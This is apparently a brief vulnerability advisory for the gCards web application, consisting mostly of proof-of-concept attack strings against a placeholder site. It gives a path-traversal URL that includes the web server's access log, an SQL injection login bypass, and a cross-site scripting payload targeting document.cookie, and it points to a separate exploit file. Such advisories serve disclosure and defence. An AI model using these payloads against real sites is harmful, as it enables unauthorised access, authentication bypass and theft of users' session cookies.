gCards Multiple Input Validation Vulnerabilities

gCards Multiple Input Validation Vulnerabilities

The following proof-of-concept examples are available:

http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file=../../../../../../../../../../../var/log/httpd/access_log

username: 'or'suntzu'='suntzu'/*
password: [whatever]

http://www.example.com/index.php?setLang=suntzu&lang[suntzu][file]=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Exploit code has been provided.

/data/vulnerabilities/exploits/gCards-multiple-vulnerabilities.php